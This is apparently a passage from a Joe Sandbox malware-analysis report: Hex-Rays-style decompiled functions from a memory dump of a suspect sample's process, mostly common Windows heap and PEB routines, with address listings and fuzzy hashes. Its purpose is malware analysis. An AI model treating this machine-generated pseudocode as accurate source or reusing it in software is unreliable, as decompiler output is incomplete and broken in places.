						L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L017D4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E017BCCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x18a8504
								E017CFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E017E4F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                                    0x017e4bad
                                                    0x017e4bbf
                                                    0x017e4bc2
                                                    0x017e4bc6
                                                    0x017e4bcd
                                                    0x017e4bd9
                                                    0x018267fe
                                                    0x01826800
                                                    0x017e4ccc
                                                    0x017e4ccd
                                                    0x017e4cb7
                                                    0x017e4cc9
                                                    0x017e4cc9
                                                    0x017e4bdf
                                                    0x017e4be5
                                                    0x00000000
                                                    0x00000000
                                                    0x017e4beb
                                                    0x017e4bef
                                                    0x00000000
                                                    0x00000000
                                                    0x017e4bf5
                                                    0x017e4bf9
                                                    0x017e4c06
                                                    0x017e4c0b
                                                    0x017e4c17
                                                    0x017e4c1c
                                                    0x017e4c1f
                                                    0x017e4c25
                                                    0x017e4c33
                                                    0x017e4c3d
                                                    0x017e4c40
                                                    0x017e4c43
                                                    0x017e4c47
                                                    0x017e4c4d
                                                    0x017e4c53
                                                    0x017e4c54
                                                    0x017e4c55
                                                    0x017e4c56
                                                    0x017e4c5b
                                                    0x017e4c5c
                                                    0x017e4c63
                                                    0x017e4c6b
                                                    0x00000000
                                                    0x00000000
                                                    0x01826776
                                                    0x01826784
                                                    0x01826784
                                                    0x0182679f
                                                    0x018267a7
                                                    0x018267af
                                                    0x018267ce
                                                    0x00000000
                                                    0x018267b1
                                                    0x018267b7
                                                    0x018267b8
                                                    0x018267c1
                                                    0x018267d3
                                                    0x018267d9
                                                    0x018267dd
                                                    0x017e4c94
                                                    0x017e4c94
                                                    0x017e4c98
                                                    0x017e4c9c
                                                    0x017e4ca3
                                                    0x018267f4
                                                    0x018267f4
                                                    0x017e4cb5
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x017e4cb5
                                                    0x017e4c79
                                                    0x017e4c7e
                                                    0x017e4c89
                                                    0x017e4c8b
                                                    0x017e4c8f
                                                    0x017e4c8f
                                                    0x00000000
                                                    0x017e4c89
                                                    0x018267c3
                                                    0x00000000
                                                    0x018267c3
                                                    0x018267af
                                                    0x017e4c73
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 75632bb9e4de44b91c6d367c809a98fb7e379a123150ea8cdaa8893be11679b8
                                                    • Instruction ID: 008114ec2e521957548eacacbb079fd88a517b338590d523c3548586a22fbc83
                                                    • Opcode Fuzzy Hash: 75632bb9e4de44b91c6d367c809a98fb7e379a123150ea8cdaa8893be11679b8
                                                    • Instruction Fuzzy Hash: 7341C631A002299FDB31DF68C944BEAB7F4EF49710F0105A9E909EB251EB34DE84CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017E4D3B Relevance: .1, Instructions: 131COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 78%
                                                    			E017E4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x18ad360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E017FFA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x18a7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E017FB0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L017D4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E017BCCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E017FB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E017FF380(_t67 + 0xc, 0x1795138, 0x10) == 0) {
								 *0x18a60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E017E4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E017E4E70(0x18a86b0, 0x17e5690, 0, 0) != 0) {
					_t46 = E017BCCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                                    0x017e4d3b
                                                    0x017e4d4d
                                                    0x017e4d53
                                                    0x017e4d58
                                                    0x017e4d65
                                                    0x017e4d6c
                                                    0x017e4d71
                                                    0x017e4d77
                                                    0x017e4d7f
                                                    0x017e4d8c
                                                    0x017e4d8e
                                                    0x017e4dad
                                                    0x017e4db0
                                                    0x017e4db7
                                                    0x017e4db8
                                                    0x017e4db9
                                                    0x017e4dba
                                                    0x017e4dbb
                                                    0x017e4dc1
                                                    0x017e4dc8
                                                    0x017e4dcc
                                                    0x017e4dd5
                                                    0x017e4dde
                                                    0x017e4ddf
                                                    0x017e4de0
                                                    0x017e4de1
                                                    0x017e4de6
                                                    0x017e4de7
                                                    0x017e4de9
                                                    0x017e4df3
                                                    0x00000000
                                                    0x00000000
                                                    0x01826c7c
                                                    0x01826c8a
                                                    0x01826c8a
                                                    0x01826c9d
                                                    0x01826ca7
                                                    0x01826cac
                                                    0x01826cb2
                                                    0x01826cb9
                                                    0x00000000
                                                    0x01826cbf
                                                    0x01826cbf
                                                    0x00000000
                                                    0x01826cbf
                                                    0x01826cb9
                                                    0x017e4dfb
                                                    0x01826ccf
                                                    0x01826cd3
                                                    0x017e4e32
                                                    0x017e4e39
                                                    0x01826ce0
                                                    0x01826cf2
                                                    0x01826cf2
                                                    0x01826ce0
                                                    0x017e4e3f
                                                    0x017e4e41
                                                    0x017e4e51
                                                    0x017e4e51
                                                    0x017e4e03
                                                    0x017e4e03
                                                    0x017e4e09
                                                    0x017e4e0f
                                                    0x017e4e57
                                                    0x00000000
                                                    0x00000000
                                                    0x017e4e1b
                                                    0x017e4e30
                                                    0x017e4e5b
                                                    0x017e4e5b
                                                    0x00000000
                                                    0x017e4e30
                                                    0x017e4e11
                                                    0x017e4e11
                                                    0x017e4e16
                                                    0x00000000
                                                    0x017e4e16
                                                    0x017e4e01
                                                    0x00000000
                                                    0x017e4e01
                                                    0x017e4da5
                                                    0x01826c6b
                                                    0x00000000
                                                    0x017e4dab
                                                    0x017e4dab
                                                    0x00000000
                                                    0x017e4dab

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: eced807d056707e6888074b8d170bf41fb5297908beffb7a488b1e079c830f53
                                                    • Instruction ID: 392a1d201c11ffdb60d65368722d5a6577d0d1fbaaf2ec94a4c0a365e662d511
                                                    • Opcode Fuzzy Hash: eced807d056707e6888074b8d170bf41fb5297908beffb7a488b1e079c830f53
                                                    • Instruction Fuzzy Hash: 0C41B171A403189FEB32DF18C888B66F7E9EB58710F004099E946D7285D774DE84CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017C8A0A Relevance: .1, Instructions: 120COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 94%
                                                    			E017C8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x18ad360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E017FB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E017CE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x1791180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E017E1DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E017F3C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E017C8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                                    0x017c8a0a
                                                    0x017c8a1c
                                                    0x017c8a23
                                                    0x017c8a2e
                                                    0x017c8a30
                                                    0x017c8a36
                                                    0x017c8a3c
                                                    0x017c8a3e
                                                    0x017c8a4a
                                                    0x017c8a52
                                                    0x017c8a9c
                                                    0x017c8aae
                                                    0x017c8a58
                                                    0x017c8a5e
                                                    0x017c8a6a
                                                    0x017c8a6f
                                                    0x017c8a75
                                                    0x017c8a7d
                                                    0x017c8a85
                                                    0x017c8a86
                                                    0x017c8a89
                                                    0x017c8a93
                                                    0x017c8a99
                                                    0x017c8a9b
                                                    0x00000000
                                                    0x017c8aaf
                                                    0x017c8abe
                                                    0x017c8ac3
                                                    0x017c8acb
                                                    0x017c8ad7
                                                    0x017c8ae0
                                                    0x017c8af1
                                                    0x00000000
                                                    0x017c8af1
                                                    0x017c8acd
                                                    0x017c8ad5
                                                    0x017c8afb
                                                    0x017c8afd
                                                    0x017c8aff
                                                    0x017c8b07
                                                    0x017c8b22
                                                    0x017c8b24
                                                    0x017c8b2a
                                                    0x017c8b2e
                                                    0x017c8b3f
                                                    0x017c8b78
                                                    0x017c8b41
                                                    0x017c8b52
                                                    0x017c8b54
                                                    0x017c8b5c
                                                    0x017c8b74
                                                    0x017c8b74
                                                    0x017c8b5c
                                                    0x017c8b3f
                                                    0x017c8b5e
                                                    0x017c8b61
                                                    0x017c8b64
                                                    0x017c8b64
                                                    0x017c8b6c
                                                    0x017c8b6c
                                                    0x017c8b11
                                                    0x01819cd5
                                                    0x01819cd5
                                                    0x017c8b17
                                                    0x017c8b1a
                                                    0x017c8b1a
                                                    0x00000000
                                                    0x017c8ad5
                                                    0x017c8a89

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4f61f812853989b30d399be7a09bf239aafb8f721ee7a309151489bfec066636
                                                    • Instruction ID: 88e560fd78926166e5627a5937e6e7be472cef6eed733d5c5995da1ef750b97f
                                                    • Opcode Fuzzy Hash: 4f61f812853989b30d399be7a09bf239aafb8f721ee7a309151489bfec066636
                                                    • Instruction Fuzzy Hash: 354162B1A4022D9BDB24DF59CC88AAAF7F4FB54700F1045EED91997252E7709E80CF61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0187AA16 Relevance: .1, Instructions: 120COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0187AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E0187ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E0187AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E0187AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E0185CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L017D77F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E017D7D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0187131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E0185CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}



















                                                    0x0187aa1f
                                                    0x0187aa21
                                                    0x0187aa23
                                                    0x0187aa2b
                                                    0x0187aa30
                                                    0x0187aa36
                                                    0x0187aa39
                                                    0x0187aa42
                                                    0x0187aa75
                                                    0x0187aa7a
                                                    0x0187aa7c
                                                    0x0187aa7c
                                                    0x0187aa88
                                                    0x0187aa8a
                                                    0x0187aa8f
                                                    0x0187ab02
                                                    0x0187ab04
                                                    0x0187aa99
                                                    0x0187aaa8
                                                    0x0187aaaf
                                                    0x0187aab3
                                                    0x0187aacc
                                                    0x0187aad1
                                                    0x0187aad6
                                                    0x0187aae0
                                                    0x0187aaf3
                                                    0x0187aaf9
                                                    0x0187aafe
                                                    0x0187aafe
                                                    0x0187aaf3
                                                    0x0187aad6
                                                    0x0187aab3
                                                    0x0187ab07
                                                    0x0187ab0a
                                                    0x0187ab11
                                                    0x0187ab23
                                                    0x0187ab13
                                                    0x0187ab1c
                                                    0x0187ab1c
                                                    0x0187ab2b
                                                    0x0187ab44
                                                    0x0187ab44
                                                    0x0187ab51
                                                    0x0187ab51
                                                    0x0187aa44
                                                    0x0187aa47
                                                    0x0187aa4c
                                                    0x00000000
                                                    0x00000000
                                                    0x0187aa5a
                                                    0x0187aa64
                                                    0x0187aa72
                                                    0x00000000
                                                    0x0187aa66
                                                    0x0187aa66
                                                    0x0187aa68
                                                    0x0187aa6a
                                                    0x00000000
                                                    0x0187aa6a

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                    • Instruction ID: 606c4676af9280cee2b297e499bf824b488726d3fac939b2d3cf39aa97a76e9b
                                                    • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                    • Instruction Fuzzy Hash: 1231F532B002096BEB199B69C885BBFFBBADF80310F0D4469E915E7291DA74CF40CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0187FDE2 Relevance: .1, Instructions: 116COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 76%
                                                    			E0187FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E0187FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E01880A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E017D7D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E01871608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E01882B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E0187C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E0187DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E017D7D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E0187A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










                                                    0x0187fde7
                                                    0x0187fde8
                                                    0x0187fdec
                                                    0x0187fdee
                                                    0x0187fdf5
                                                    0x0187fdf7
                                                    0x0187fdfc
                                                    0x0187fe19
                                                    0x0187fe22
                                                    0x0187fe26
                                                    0x0187fec6
                                                    0x0187fecd
                                                    0x0187fed5
                                                    0x0187fee7
                                                    0x0187fed7
                                                    0x0187fee0
                                                    0x0187fee0
                                                    0x0187feef
                                                    0x0187ff00
                                                    0x0187ff02
                                                    0x0187ff07
                                                    0x0187ff07
                                                    0x00000000
                                                    0x0187feef
                                                    0x0187fe33
                                                    0x0187fe55
                                                    0x0187fe59
                                                    0x0187fe5b
                                                    0x0187fe5e
                                                    0x0187fe69
                                                    0x0187fe6d
                                                    0x0187fe6d
                                                    0x0187fe69
                                                    0x0187fe35
                                                    0x0187fe41
                                                    0x0187fe41
                                                    0x0187fe79
                                                    0x0187fe8b
                                                    0x0187fe7b
                                                    0x0187fe84
                                                    0x0187fe84
                                                    0x0187fe93
                                                    0x00000000
                                                    0x0187fea8
                                                    0x0187feba
                                                    0x00000000
                                                    0x0187feba
                                                    0x0187fdfe
                                                    0x0187fe01
                                                    0x0187fe02
                                                    0x0187fe08
                                                    0x0187ff0c
                                                    0x0187ff14
                                                    0x0187ff14

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                    • Instruction ID: 1a2dc185a7dc46f38268970703ec29e81c84a99ec1de32dac4f35677e7dc693b
                                                    • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                    • Instruction Fuzzy Hash: 58311632200645AFD3229B6EC844F6ABBA9EF85B50F184458EA66CB342DE74DE41C761
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0187EA55 Relevance: .1, Instructions: 111COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 70%
                                                    			E0187EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E017D2280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E0187E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E017BF900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E017CFFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E0187AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E0187BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E017D7D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E0186FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E017CFFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E0187A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}






















                                                    0x0187ea55
                                                    0x0187ea66
                                                    0x0187ea68
                                                    0x0187ea6c
                                                    0x0187ea6f
                                                    0x0187ea72
                                                    0x0187ea75
                                                    0x0187ea7a
                                                    0x0187ea7a
                                                    0x0187ea7e
                                                    0x0187ea80
                                                    0x0187ea85
                                                    0x0187ea8b
                                                    0x0187eab5
                                                    0x0187eabc
                                                    0x0187eabf
                                                    0x0187eabf
                                                    0x0187eaca
                                                    0x0187eace
                                                    0x0187ead0
                                                    0x0187eae4
                                                    0x0187eaeb
                                                    0x0187eaf0
                                                    0x0187eaf5
                                                    0x0187eb09
                                                    0x0187eb0d
                                                    0x0187eb1d
                                                    0x0187eb2d
                                                    0x0187eb38
                                                    0x0187eb3d
                                                    0x0187eb41
                                                    0x0187eb4a
                                                    0x0187eb60
                                                    0x0187eb4c
                                                    0x0187eb52
                                                    0x0187eb59
                                                    0x0187eb59
                                                    0x0187eb68
                                                    0x0187eb71
                                                    0x0187eb71
                                                    0x0187ea8d
                                                    0x0187ea8f
                                                    0x0187ea92
                                                    0x0187ea97
                                                    0x0187ea97
                                                    0x0187ea9b
                                                    0x0187ea9c
                                                    0x0187ea9e
                                                    0x0187eaa6
                                                    0x0187eaa6
                                                    0x0187eb7e

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                    • Instruction ID: 7a7e81a7ff8380b20b402ef70de1cdea433e1b9e3680b6f1f77531d81d058ca7
                                                    • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                    • Instruction Fuzzy Hash: 0731D2326047069BC719DF28C884A6BF7AAFFD4710F04496DF552C7645DE30E905CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 018369A6 Relevance: .1, Instructions: 108COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 69%
                                                    			E018369A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x18ad360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L017C6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E01836BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E017F9980() >= 0) {
							E017D2280(_t56, 0x18a8778);
